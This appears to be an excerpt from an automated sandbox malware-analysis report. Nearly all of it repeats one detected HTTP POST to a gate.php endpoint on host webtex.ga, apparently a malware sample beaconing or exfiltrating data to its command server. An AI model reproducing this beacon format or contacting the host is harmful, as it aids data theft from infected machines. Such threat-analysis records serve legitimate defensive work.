              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
